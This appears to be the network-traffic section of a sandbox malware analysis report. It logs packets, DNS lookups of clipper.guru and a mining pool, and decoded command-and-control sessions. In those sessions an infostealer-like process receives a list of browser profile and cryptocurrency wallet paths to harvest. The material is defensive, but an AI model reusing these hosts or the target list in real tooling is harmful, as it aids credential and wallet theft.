Nov 7, 2022 23:49:10.317905903 CET	443	49724	35.213.155.151	192.168.2.7
Nov 7, 2022 23:49:10.317982912 CET	49724	443	192.168.2.7	35.213.155.151
Nov 7, 2022 23:49:10.317992926 CET	443	49724	35.213.155.151	192.168.2.7
Nov 7, 2022 23:49:10.318007946 CET	443	49724	35.213.155.151	192.168.2.7
Nov 7, 2022 23:49:10.318037033 CET	443	49724	35.213.155.151	192.168.2.7
Nov 7, 2022 23:49:10.318044901 CET	49724	443	192.168.2.7	35.213.155.151
Nov 7, 2022 23:49:10.318044901 CET	49724	443	192.168.2.7	35.213.155.151
Nov 7, 2022 23:49:10.318084002 CET	49724	443	192.168.2.7	35.213.155.151
Nov 7, 2022 23:49:10.318095922 CET	443	49724	35.213.155.151	192.168.2.7
Nov 7, 2022 23:49:10.318116903 CET	49724	443	192.168.2.7	35.213.155.151
Nov 7, 2022 23:49:10.318118095 CET	443	49724	35.213.155.151	192.168.2.7
Nov 7, 2022 23:49:10.318156958 CET	443	49724	35.213.155.151	192.168.2.7
Nov 7, 2022 23:49:10.318175077 CET	49724	443	192.168.2.7	35.213.155.151
Nov 7, 2022 23:49:10.318185091 CET	443	49724	35.213.155.151	192.168.2.7
Nov 7, 2022 23:49:10.318224907 CET	49724	443	192.168.2.7	35.213.155.151
Nov 7, 2022 23:49:10.318244934 CET	443	49724	35.213.155.151	192.168.2.7
Nov 7, 2022 23:49:10.318253040 CET	49724	443	192.168.2.7	35.213.155.151
Nov 7, 2022 23:49:10.318259954 CET	443	49724	35.213.155.151	192.168.2.7
Nov 7, 2022 23:49:10.318284035 CET	443	49724	35.213.155.151	192.168.2.7
Nov 7, 2022 23:49:10.318303108 CET	49724	443	192.168.2.7	35.213.155.151
Nov 7, 2022 23:49:10.318314075 CET	443	49724	35.213.155.151	192.168.2.7
Nov 7, 2022 23:49:10.318336964 CET	49724	443	192.168.2.7	35.213.155.151
Nov 7, 2022 23:49:10.318337917 CET	443	49724	35.213.155.151	192.168.2.7
Nov 7, 2022 23:49:10.318353891 CET	49724	443	192.168.2.7	35.213.155.151
Nov 7, 2022 23:49:10.318361044 CET	443	49724	35.213.155.151	192.168.2.7
Nov 7, 2022 23:49:10.318384886 CET	443	49724	35.213.155.151	192.168.2.7
Nov 7, 2022 23:49:10.318391085 CET	49724	443	192.168.2.7	35.213.155.151
Nov 7, 2022 23:49:10.318423986 CET	49724	443	192.168.2.7	35.213.155.151
Nov 7, 2022 23:49:10.318430901 CET	443	49724	35.213.155.151	192.168.2.7
Nov 7, 2022 23:49:10.318466902 CET	49724	443	192.168.2.7	35.213.155.151
Nov 7, 2022 23:49:10.318469048 CET	443	49724	35.213.155.151	192.168.2.7
Nov 7, 2022 23:49:10.318480968 CET	49724	443	192.168.2.7	35.213.155.151
Nov 7, 2022 23:49:10.318490028 CET	443	49724	35.213.155.151	192.168.2.7
Nov 7, 2022 23:49:10.318514109 CET	443	49724	35.213.155.151	192.168.2.7
Nov 7, 2022 23:49:10.318531036 CET	49724	443	192.168.2.7	35.213.155.151
Nov 7, 2022 23:49:10.318588972 CET	49724	443	192.168.2.7	35.213.155.151
Nov 7, 2022 23:49:10.318588972 CET	49724	443	192.168.2.7	35.213.155.151
Nov 7, 2022 23:49:10.319947004 CET	49724	443	192.168.2.7	35.213.155.151
Nov 7, 2022 23:49:10.319963932 CET	443	49724	35.213.155.151	192.168.2.7
Nov 7, 2022 23:49:10.319987059 CET	443	49724	35.213.155.151	192.168.2.7
Nov 7, 2022 23:49:10.320139885 CET	49724	443	192.168.2.7	35.213.155.151
Nov 7, 2022 23:49:10.320152998 CET	443	49724	35.213.155.151	192.168.2.7
Nov 7, 2022 23:49:10.320229053 CET	49724	443	192.168.2.7	35.213.155.151
Nov 7, 2022 23:49:10.320240021 CET	443	49724	35.213.155.151	192.168.2.7
Nov 7, 2022 23:49:10.320350885 CET	49724	443	192.168.2.7	35.213.155.151
Nov 7, 2022 23:49:10.320370913 CET	443	49724	35.213.155.151	192.168.2.7
Nov 7, 2022 23:49:10.320449114 CET	49724	443	192.168.2.7	35.213.155.151
Nov 7, 2022 23:49:10.320456982 CET	443	49724	35.213.155.151	192.168.2.7
Nov 7, 2022 23:49:10.320533991 CET	49724	443	192.168.2.7	35.213.155.151
Nov 7, 2022 23:49:10.320542097 CET	443	49724	35.213.155.151	192.168.2.7
Nov 7, 2022 23:49:10.320564985 CET	49724	443	192.168.2.7	35.213.155.151
Nov 7, 2022 23:49:10.320574999 CET	443	49724	35.213.155.151	192.168.2.7
Nov 7, 2022 23:49:10.320591927 CET	443	49724	35.213.155.151	192.168.2.7
Nov 7, 2022 23:49:10.320683002 CET	49724	443	192.168.2.7	35.213.155.151
Nov 7, 2022 23:49:10.320743084 CET	49724	443	192.168.2.7	35.213.155.151
Nov 7, 2022 23:49:10.320753098 CET	443	49724	35.213.155.151	192.168.2.7
Nov 7, 2022 23:49:10.320822954 CET	49724	443	192.168.2.7	35.213.155.151
Nov 7, 2022 23:49:10.328208923 CET	49724	443	192.168.2.7	35.213.155.151
Nov 7, 2022 23:49:10.328244925 CET	443	49724	35.213.155.151	192.168.2.7
Nov 7, 2022 23:49:10.328294992 CET	443	49724	35.213.155.151	192.168.2.7
Nov 7, 2022 23:49:10.328306913 CET	443	49724	35.213.155.151	192.168.2.7
Nov 7, 2022 23:49:10.328520060 CET	49724	443	192.168.2.7	35.213.155.151
Nov 7, 2022 23:49:10.328541994 CET	443	49724	35.213.155.151	192.168.2.7
Nov 7, 2022 23:49:10.328572035 CET	443	49724	35.213.155.151	192.168.2.7
Nov 7, 2022 23:49:10.328598976 CET	443	49724	35.213.155.151	192.168.2.7
Nov 7, 2022 23:49:10.328669071 CET	49724	443	192.168.2.7	35.213.155.151
Nov 7, 2022 23:49:10.328682899 CET	443	49724	35.213.155.151	192.168.2.7
Nov 7, 2022 23:49:10.328700066 CET	443	49724	35.213.155.151	192.168.2.7
Nov 7, 2022 23:49:10.328764915 CET	49724	443	192.168.2.7	35.213.155.151
Nov 7, 2022 23:49:10.328779936 CET	443	49724	35.213.155.151	192.168.2.7
Nov 7, 2022 23:49:10.328833103 CET	49724	443	192.168.2.7	35.213.155.151
Nov 7, 2022 23:49:10.328844070 CET	443	49724	35.213.155.151	192.168.2.7
Nov 7, 2022 23:49:10.328881979 CET	49724	443	192.168.2.7	35.213.155.151
Nov 7, 2022 23:49:10.328922987 CET	49724	443	192.168.2.7	35.213.155.151
Nov 7, 2022 23:49:10.335505009 CET	49724	443	192.168.2.7	35.213.155.151
Nov 7, 2022 23:49:10.335539103 CET	443	49724	35.213.155.151	192.168.2.7
Nov 7, 2022 23:49:10.335596085 CET	443	49724	35.213.155.151	192.168.2.7
Nov 7, 2022 23:49:10.335609913 CET	443	49724	35.213.155.151	192.168.2.7
Nov 7, 2022 23:49:10.335905075 CET	49724	443	192.168.2.7	35.213.155.151
Nov 7, 2022 23:49:10.335990906 CET	443	49724	35.213.155.151	192.168.2.7
Nov 7, 2022 23:49:10.336014032 CET	443	49724	35.213.155.151	192.168.2.7
Nov 7, 2022 23:49:10.336039066 CET	443	49724	35.213.155.151	192.168.2.7
Nov 7, 2022 23:49:10.336149931 CET	49724	443	192.168.2.7	35.213.155.151
Nov 7, 2022 23:49:10.336177111 CET	443	49724	35.213.155.151	192.168.2.7
Nov 7, 2022 23:49:10.336242914 CET	49724	443	192.168.2.7	35.213.155.151
Nov 7, 2022 23:49:10.336256981 CET	443	49724	35.213.155.151	192.168.2.7
Nov 7, 2022 23:49:10.336278915 CET	443	49724	35.213.155.151	192.168.2.7
Nov 7, 2022 23:49:10.336388111 CET	49724	443	192.168.2.7	35.213.155.151
Nov 7, 2022 23:49:10.336479902 CET	49724	443	192.168.2.7	35.213.155.151
Nov 7, 2022 23:49:10.344196081 CET	49724	443	192.168.2.7	35.213.155.151
Nov 7, 2022 23:49:10.344250917 CET	443	49724	35.213.155.151	192.168.2.7
Nov 7, 2022 23:49:10.344306946 CET	443	49724	35.213.155.151	192.168.2.7
Nov 7, 2022 23:49:10.344346046 CET	443	49724	35.213.155.151	192.168.2.7
Nov 7, 2022 23:49:10.344358921 CET	443	49724	35.213.155.151	192.168.2.7
Nov 7, 2022 23:49:10.344513893 CET	49724	443	192.168.2.7	35.213.155.151
Nov 7, 2022 23:49:10.344537973 CET	443	49724	35.213.155.151	192.168.2.7
Nov 7, 2022 23:49:10.344607115 CET	49724	443	192.168.2.7	35.213.155.151
Nov 7, 2022 23:49:10.344625950 CET	443	49724	35.213.155.151	192.168.2.7
Nov 7, 2022 23:49:10.344647884 CET	443	49724	35.213.155.151	192.168.2.7
Nov 7, 2022 23:49:10.344860077 CET	49724	443	192.168.2.7	35.213.155.151
Nov 7, 2022 23:49:10.344883919 CET	443	49724	35.213.155.151	192.168.2.7
Nov 7, 2022 23:49:10.344938993 CET	49724	443	192.168.2.7	35.213.155.151
Nov 7, 2022 23:49:10.344965935 CET	443	49724	35.213.155.151	192.168.2.7
Nov 7, 2022 23:49:10.345017910 CET	49724	443	192.168.2.7	35.213.155.151
Nov 7, 2022 23:49:10.345096111 CET	49724	443	192.168.2.7	35.213.155.151
Nov 7, 2022 23:49:10.351380110 CET	49724	443	192.168.2.7	35.213.155.151
Nov 7, 2022 23:49:10.351399899 CET	443	49724	35.213.155.151	192.168.2.7
Nov 7, 2022 23:49:10.351425886 CET	443	49724	35.213.155.151	192.168.2.7
Nov 7, 2022 23:49:10.351449013 CET	443	49724	35.213.155.151	192.168.2.7
Nov 7, 2022 23:49:10.351454020 CET	443	49724	35.213.155.151	192.168.2.7
Nov 7, 2022 23:49:10.351658106 CET	49724	443	192.168.2.7	35.213.155.151
Nov 7, 2022 23:49:10.351670980 CET	443	49724	35.213.155.151	192.168.2.7
Nov 7, 2022 23:49:10.351732969 CET	49724	443	192.168.2.7	35.213.155.151
Nov 7, 2022 23:49:10.351742983 CET	443	49724	35.213.155.151	192.168.2.7
Nov 7, 2022 23:49:10.351766109 CET	443	49724	35.213.155.151	192.168.2.7
Nov 7, 2022 23:49:10.351824045 CET	49724	443	192.168.2.7	35.213.155.151
Nov 7, 2022 23:49:10.351830006 CET	443	49724	35.213.155.151	192.168.2.7
Nov 7, 2022 23:49:10.351838112 CET	443	49724	35.213.155.151	192.168.2.7
Nov 7, 2022 23:49:10.351928949 CET	49724	443	192.168.2.7	35.213.155.151
Nov 7, 2022 23:49:10.352001905 CET	49724	443	192.168.2.7	35.213.155.151
Nov 7, 2022 23:49:10.359564066 CET	49724	443	192.168.2.7	35.213.155.151
Nov 7, 2022 23:49:10.359597921 CET	443	49724	35.213.155.151	192.168.2.7
Nov 7, 2022 23:49:10.359626055 CET	443	49724	35.213.155.151	192.168.2.7
Nov 7, 2022 23:49:10.359817028 CET	49724	443	192.168.2.7	35.213.155.151
Nov 7, 2022 23:49:10.359872103 CET	443	49724	35.213.155.151	192.168.2.7
Nov 7, 2022 23:49:10.359891891 CET	49724	443	192.168.2.7	35.213.155.151
Nov 7, 2022 23:49:10.362385988 CET	49724	443	192.168.2.7	35.213.155.151
Nov 7, 2022 23:49:10.366208076 CET	49724	443	192.168.2.7	35.213.155.151
Nov 7, 2022 23:49:10.373800993 CET	443	49724	35.213.155.151	192.168.2.7
Nov 7, 2022 23:49:10.373850107 CET	443	49724	35.213.155.151	192.168.2.7
Nov 7, 2022 23:49:10.374005079 CET	49724	443	192.168.2.7	35.213.155.151
Nov 7, 2022 23:49:10.374030113 CET	443	49724	35.213.155.151	192.168.2.7
Nov 7, 2022 23:49:10.374074936 CET	49724	443	192.168.2.7	35.213.155.151
Nov 7, 2022 23:49:10.383569002 CET	49724	443	192.168.2.7	35.213.155.151
Nov 7, 2022 23:49:10.385544062 CET	49724	443	192.168.2.7	35.213.155.151
Nov 7, 2022 23:49:10.439338923 CET	443	49724	35.213.155.151	192.168.2.7
Nov 7, 2022 23:49:10.439393997 CET	443	49724	35.213.155.151	192.168.2.7
Nov 7, 2022 23:49:10.439505100 CET	49724	443	192.168.2.7	35.213.155.151
Nov 7, 2022 23:49:10.439524889 CET	443	49724	35.213.155.151	192.168.2.7
Nov 7, 2022 23:49:10.439557076 CET	49724	443	192.168.2.7	35.213.155.151
Nov 7, 2022 23:49:10.439568043 CET	49724	443	192.168.2.7	35.213.155.151
Nov 7, 2022 23:49:10.439584017 CET	443	49724	35.213.155.151	192.168.2.7
Nov 7, 2022 23:49:10.439634085 CET	443	49724	35.213.155.151	192.168.2.7
Nov 7, 2022 23:49:10.439661980 CET	49724	443	192.168.2.7	35.213.155.151
Nov 7, 2022 23:49:10.439671040 CET	443	49724	35.213.155.151	192.168.2.7
Nov 7, 2022 23:49:10.439696074 CET	49724	443	192.168.2.7	35.213.155.151
Nov 7, 2022 23:49:10.439704895 CET	49724	443	192.168.2.7	35.213.155.151
Nov 7, 2022 23:49:10.440058947 CET	443	49724	35.213.155.151	192.168.2.7
Nov 7, 2022 23:49:10.440104008 CET	443	49724	35.213.155.151	192.168.2.7
Nov 7, 2022 23:49:10.440145969 CET	49724	443	192.168.2.7	35.213.155.151
Nov 7, 2022 23:49:10.440156937 CET	443	49724	35.213.155.151	192.168.2.7
Nov 7, 2022 23:49:10.440188885 CET	49724	443	192.168.2.7	35.213.155.151
Nov 7, 2022 23:49:10.440201044 CET	49724	443	192.168.2.7	35.213.155.151
Nov 7, 2022 23:49:10.440501928 CET	443	49724	35.213.155.151	192.168.2.7
Nov 7, 2022 23:49:10.440535069 CET	443	49724	35.213.155.151	192.168.2.7
Nov 7, 2022 23:49:10.440597057 CET	49724	443	192.168.2.7	35.213.155.151
Nov 7, 2022 23:49:10.440637112 CET	443	49724	35.213.155.151	192.168.2.7
Nov 7, 2022 23:49:10.440677881 CET	49724	443	192.168.2.7	35.213.155.151
Nov 7, 2022 23:49:10.440677881 CET	49724	443	192.168.2.7	35.213.155.151
Nov 7, 2022 23:49:10.441195965 CET	443	49724	35.213.155.151	192.168.2.7
Nov 7, 2022 23:49:10.441251993 CET	443	49724	35.213.155.151	192.168.2.7
Nov 7, 2022 23:49:10.441318035 CET	49724	443	192.168.2.7	35.213.155.151
Nov 7, 2022 23:49:10.441340923 CET	443	49724	35.213.155.151	192.168.2.7
Nov 7, 2022 23:49:10.441395044 CET	49724	443	192.168.2.7	35.213.155.151
Nov 7, 2022 23:49:10.441418886 CET	443	49724	35.213.155.151	192.168.2.7
Nov 7, 2022 23:49:10.441469908 CET	443	49724	35.213.155.151	192.168.2.7
Nov 7, 2022 23:49:10.441509008 CET	49724	443	192.168.2.7	35.213.155.151
Nov 7, 2022 23:49:10.441528082 CET	443	49724	35.213.155.151	192.168.2.7
Nov 7, 2022 23:49:10.441559076 CET	49724	443	192.168.2.7	35.213.155.151
Nov 7, 2022 23:49:10.441749096 CET	49724	443	192.168.2.7	35.213.155.151
Nov 7, 2022 23:49:10.441921949 CET	443	49724	35.213.155.151	192.168.2.7
Nov 7, 2022 23:49:10.441967964 CET	443	49724	35.213.155.151	192.168.2.7
Nov 7, 2022 23:49:10.442027092 CET	49724	443	192.168.2.7	35.213.155.151
Nov 7, 2022 23:49:10.442073107 CET	443	49724	35.213.155.151	192.168.2.7
Nov 7, 2022 23:49:10.442188025 CET	49724	443	192.168.2.7	35.213.155.151
Nov 7, 2022 23:49:10.442354918 CET	443	49724	35.213.155.151	192.168.2.7
Nov 7, 2022 23:49:10.442409992 CET	443	49724	35.213.155.151	192.168.2.7
Nov 7, 2022 23:49:10.442517042 CET	49724	443	192.168.2.7	35.213.155.151
Nov 7, 2022 23:49:10.442517042 CET	49724	443	192.168.2.7	35.213.155.151
Nov 7, 2022 23:49:10.442588091 CET	443	49724	35.213.155.151	192.168.2.7
Nov 7, 2022 23:49:10.442615032 CET	443	49724	35.213.155.151	192.168.2.7
Nov 7, 2022 23:49:10.442679882 CET	49724	443	192.168.2.7	35.213.155.151
Nov 7, 2022 23:49:10.442759037 CET	443	49724	35.213.155.151	192.168.2.7
Nov 7, 2022 23:49:10.442823887 CET	49724	443	192.168.2.7	35.213.155.151
Nov 7, 2022 23:49:10.442823887 CET	49724	443	192.168.2.7	35.213.155.151
Nov 7, 2022 23:49:10.444777966 CET	49724	443	192.168.2.7	35.213.155.151
Nov 7, 2022 23:49:11.408992052 CET	49711	80	192.168.2.7	79.137.204.112
Nov 7, 2022 23:49:11.438353062 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:49:11.576939106 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:49:11.577428102 CET	49711	80	192.168.2.7	79.137.204.112
Nov 7, 2022 23:49:11.606924057 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:49:11.726537943 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:49:11.727036953 CET	49711	80	192.168.2.7	79.137.204.112
Nov 7, 2022 23:49:11.756364107 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:49:11.890518904 CET	80	49711	79.137.204.112	192.168.2.7
Nov 7, 2022 23:49:11.960834980 CET	49711	80	192.168.2.7	79.137.204.112
Nov 7, 2022 23:49:40.128428936 CET	80	49725	45.159.189.115	192.168.2.7
Nov 7, 2022 23:49:40.128746033 CET	49725	80	192.168.2.7	45.159.189.115
Nov 7, 2022 23:49:40.139111996 CET	49725	80	192.168.2.7	45.159.189.115
Nov 7, 2022 23:49:40.174686909 CET	80	49725	45.159.189.115	192.168.2.7
Nov 7, 2022 23:50:16.446945906 CET	49730	80	192.168.2.7	45.159.189.115
Nov 7, 2022 23:50:16.480880022 CET	80	49730	45.159.189.115	192.168.2.7
Nov 7, 2022 23:50:16.481048107 CET	49730	80	192.168.2.7	45.159.189.115
Nov 7, 2022 23:50:16.481925964 CET	49730	80	192.168.2.7	45.159.189.115
Nov 7, 2022 23:50:16.515727043 CET	80	49730	45.159.189.115	192.168.2.7
Nov 7, 2022 23:50:16.515762091 CET	80	49730	45.159.189.115	192.168.2.7
Nov 7, 2022 23:50:16.516701937 CET	49730	80	192.168.2.7	45.159.189.115
Nov 7, 2022 23:50:16.551136017 CET	80	49730	45.159.189.115	192.168.2.7
Nov 7, 2022 23:50:16.742552042 CET	49730	80	192.168.2.7	45.159.189.115
Nov 7, 2022 23:50:46.548330069 CET	80	49730	45.159.189.115	192.168.2.7
Nov 7, 2022 23:50:46.548460007 CET	49730	80	192.168.2.7	45.159.189.115

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 7, 2022 23:48:41.818152905 CET	50835	53	192.168.2.7	8.8.8.8
Nov 7, 2022 23:48:41.856498003 CET	50505	53	192.168.2.7	8.8.8.8
Nov 7, 2022 23:48:50.134594917 CET	61178	53	192.168.2.7	8.8.8.8
Nov 7, 2022 23:48:50.154886007 CET	53	61178	8.8.8.8	192.168.2.7
Nov 7, 2022 23:49:01.848077059 CET	58283	53	192.168.2.7	8.8.8.8
Nov 7, 2022 23:49:01.870172024 CET	53	58283	8.8.8.8	192.168.2.7
Nov 7, 2022 23:49:07.574342966 CET	61392	53	192.168.2.7	8.8.8.8
Nov 7, 2022 23:49:07.596966982 CET	53	61392	8.8.8.8	192.168.2.7
Nov 7, 2022 23:49:09.802746058 CET	52104	53	192.168.2.7	8.8.8.8
Nov 7, 2022 23:49:09.820174932 CET	53	52104	8.8.8.8	192.168.2.7
Nov 7, 2022 23:50:16.427615881 CET	58784	53	192.168.2.7	8.8.8.8
Nov 7, 2022 23:50:16.445101976 CET	53	58784	8.8.8.8	192.168.2.7
Nov 7, 2022 23:50:41.139322996 CET	57970	53	192.168.2.7	8.8.8.8
Nov 7, 2022 23:50:41.157219887 CET	53	57970	8.8.8.8	192.168.2.7

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 7, 2022 23:48:41.818152905 CET	192.168.2.7	8.8.8.8	0xdc7c	Standard query (0)	api.ip.sb	A (IP address)	IN (0x0001)	false
Nov 7, 2022 23:48:41.856498003 CET	192.168.2.7	8.8.8.8	0xb1b7	Standard query (0)	api.ip.sb	A (IP address)	IN (0x0001)	false
Nov 7, 2022 23:48:50.134594917 CET	192.168.2.7	8.8.8.8	0x333	Standard query (0)	ezisc.com	A (IP address)	IN (0x0001)	false
Nov 7, 2022 23:49:01.848077059 CET	192.168.2.7	8.8.8.8	0x90a1	Standard query (0)	ezisc.com	A (IP address)	IN (0x0001)	false
Nov 7, 2022 23:49:07.574342966 CET	192.168.2.7	8.8.8.8	0x4670	Standard query (0)	ezisc.com	A (IP address)	IN (0x0001)	false
Nov 7, 2022 23:49:09.802746058 CET	192.168.2.7	8.8.8.8	0xfff9	Standard query (0)	clipper.guru	A (IP address)	IN (0x0001)	false
Nov 7, 2022 23:50:16.427615881 CET	192.168.2.7	8.8.8.8	0x3c1e	Standard query (0)	clipper.guru	A (IP address)	IN (0x0001)	false
Nov 7, 2022 23:50:41.139322996 CET	192.168.2.7	8.8.8.8	0x7b3	Standard query (0)	pool.hashvault.pro	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Nov 7, 2022 23:48:41.839925051 CET	8.8.8.8	192.168.2.7	0xdc7c	No error (0)	api.ip.sb	api.ip.sb.cdn.cloudflare.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 7, 2022 23:48:41.876409054 CET	8.8.8.8	192.168.2.7	0xb1b7	No error (0)	api.ip.sb	api.ip.sb.cdn.cloudflare.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 7, 2022 23:48:50.154886007 CET	8.8.8.8	192.168.2.7	0x333	No error (0)	ezisc.com		35.213.155.151	A (IP address)	IN (0x0001)	false
Nov 7, 2022 23:49:01.870172024 CET	8.8.8.8	192.168.2.7	0x90a1	No error (0)	ezisc.com		35.213.155.151	A (IP address)	IN (0x0001)	false
Nov 7, 2022 23:49:07.596966982 CET	8.8.8.8	192.168.2.7	0x4670	No error (0)	ezisc.com		35.213.155.151	A (IP address)	IN (0x0001)	false
Nov 7, 2022 23:49:09.820174932 CET	8.8.8.8	192.168.2.7	0xfff9	No error (0)	clipper.guru		45.159.189.115	A (IP address)	IN (0x0001)	false
Nov 7, 2022 23:50:16.445101976 CET	8.8.8.8	192.168.2.7	0x3c1e	No error (0)	clipper.guru		45.159.189.115	A (IP address)	IN (0x0001)	false
Nov 7, 2022 23:50:41.157219887 CET	8.8.8.8	192.168.2.7	0x7b3	No error (0)	pool.hashvault.pro		45.76.89.70	A (IP address)	IN (0x0001)	false
Nov 7, 2022 23:50:41.157219887 CET	8.8.8.8	192.168.2.7	0x7b3	No error (0)	pool.hashvault.pro		95.179.241.203	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

ezisc.com

clipper.guru

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.7	49713	35.213.155.151	443	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.7	49722	35.213.155.151	443	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.7	49724	35.213.155.151	443	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.7	49711	79.137.204.112	80	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Timestamp	kBytes transferred	Direction	Data
Nov 7, 2022 23:48:30.299207926 CET	99	OUT	Data Raw: 00 01 00 01 02 02 1c 6e 65 74 2e 74 63 70 3a 2f 2f 37 39 2e 31 33 37 2e 32 30 34 2e 31 31 32 3a 38 30 2f 03 08 0c Data Ascii: net.tcp://79.137.204.112:80/
Nov 7, 2022 23:48:30.396230936 CET	99	IN	Data Raw: 0b Data Ascii:
Nov 7, 2022 23:48:32.272363901 CET	99	OUT	Data Raw: 06 c8 01 53 1d 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 45 6e 74 69 74 79 2f 49 64 31 1c 6e 65 74 2e 74 63 70 3a 2f 2f 37 39 2e 31 33 37 2e 32 30 34 2e 31 31 32 3a 38 30 2f 03 49 64 31 13 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 Data Ascii: Shttp://tempuri.org/Entity/Id1net.tcp://79.137.204.112:80/Id1http://tempuri.org/VsaVD@Authorizationns1 0ba115baec822e8fab2188d69bd8b714DsLNN%{+D,D*DVB
Nov 7, 2022 23:48:32.369813919 CET	100	IN	Data Raw: 06 8b 01 50 25 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 45 6e 74 69 74 79 2f 49 64 31 52 65 73 70 6f 6e 73 65 0b 49 64 31 52 65 73 70 6f 6e 73 65 13 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 09 49 64 31 52 65 73 75 Data Ascii: P%http://tempuri.org/Entity/Id1ResponseId1Responsehttp://tempuri.org/Id1ResultVsaVDDsLNN%{+DVBB
Nov 7, 2022 23:48:40.092865944 CET	100	OUT	Data Raw: 06 97 01 22 1d 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 45 6e 74 69 74 79 2f 49 64 32 03 49 64 32 56 02 0b 01 73 04 0b 01 61 06 56 08 44 0a 1e 00 82 ab 09 40 0d 41 75 74 68 6f 72 69 7a 61 74 69 6f 6e 08 03 6e 73 31 99 20 30 62 61 Data Ascii: "http://tempuri.org/Entity/Id2Id2VsaVD@Authorizationns1 0ba115baec822e8fab2188d69bd8b714Db?2JzAD,D*DVB
Nov 7, 2022 23:48:40.191665888 CET	101	IN	Data Raw: 06 86 23 f8 01 25 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 45 6e 74 69 74 79 2f 49 64 32 52 65 73 70 6f 6e 73 65 0b 49 64 32 52 65 73 70 6f 6e 73 65 09 49 64 32 52 65 73 75 6c 74 06 45 6e 74 69 74 79 29 68 74 74 70 3a 2f 2f 77 77 Data Ascii: #%http://tempuri.org/Entity/Id2ResponseId2ResponseId2ResultEntity)http://www.w3.org/2001/XMLSchema-instanceId1Id109http://schemas.microsoft.com/2003/10/Serialization/ArraysstringId11Id12Id13Entity17Id2Id3Entity16Id4Id5Id6I
Nov 7, 2022 23:48:40.191703081 CET	101	IN	Data Raw: 61 6c Data Ascii: al
Nov 7, 2022 23:48:40.191720963 CET	103	IN	Data Raw: 5c 43 68 65 64 6f 74 5c 55 73 65 72 20 44 61 74 61 46 19 99 2d 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 56 69 76 61 6c 64 69 5c 55 73 65 72 20 44 61 74 61 46 19 99 2c 25 55 53 45 52 50 52 4f 46 49 4c 45 Data Ascii: \Chedot\User DataF-%USERPROFILE%\AppData\Local\Vivaldi\User DataF,%USERPROFILE%\AppData\Local\Kometa\User DataF6%USERPROFILE%\AppData\Local\Elements Browser\User DataF:%USERPROFILE%\AppData\Local\Epic Privacy Browser\User DataF4%USER
Nov 7, 2022 23:48:40.191739082 CET	104	IN	Data Raw: 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 43 68 72 6f 6d 6f 64 6f 5c 55 73 65 72 20 44 61 74 61 46 19 99 32 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 4d 61 69 6c 2e 52 75 5c 41 74 6f 6d 5c 55 73 65 72 Data Ascii: \AppData\Local\Chromodo\User DataF2%USERPROFILE%\AppData\Local\Mail.Ru\Atom\User DataFA%USERPROFILE%\AppData\Local\BraveSoftware\Brave-Browser\User DataF4%USERPROFILE%\AppData\Local\Microsoft\Edge\User DataFH%USERPROFILE%\AppData\Local
Nov 7, 2022 23:48:40.191755056 CET	105	IN	Data Raw: 2e 77 61 6c 6c 65 74 45 23 99 01 2a 45 25 85 01 45 27 45 13 99 06 45 78 6f 64 75 73 45 23 99 06 2a 2e 6a 73 6f 6e 45 25 85 01 01 01 45 21 45 13 99 06 47 75 61 72 64 61 45 23 99 09 25 61 70 70 64 61 74 61 25 45 25 45 27 45 13 99 06 47 75 61 72 64 Data Ascii: .walletE#E%E'EExodusE#.jsonE%E!EGuardaE#%appdata%E%E'EGuardaE#E%E!EJaxxE#%appdata%E%E'Ecom.liberty.jaxxE#E%E!EMoneroE#%userprofile%\DocumentsE%E'EMonero\walletsE#*E%E!ELedgerE#%ap
Nov 7, 2022 23:48:47.520314932 CET	123	OUT	Data Raw: 06 ec c3 34 f0 01 1d 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 45 6e 74 69 74 79 2f 49 64 33 03 49 64 33 04 75 73 65 72 06 45 6e 74 69 74 79 29 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 Data Ascii: 4http://tempuri.org/Entity/Id3Id3userEntity)http://www.w3.org/2001/XMLSchema-instanceId10Id11Id12Id13nilId14Id15Id4Id5Id6Id79http://schemas.microsoft.com/2003/10/Serialization/ArraysstringId16Entity5Entity3Id8Entity4
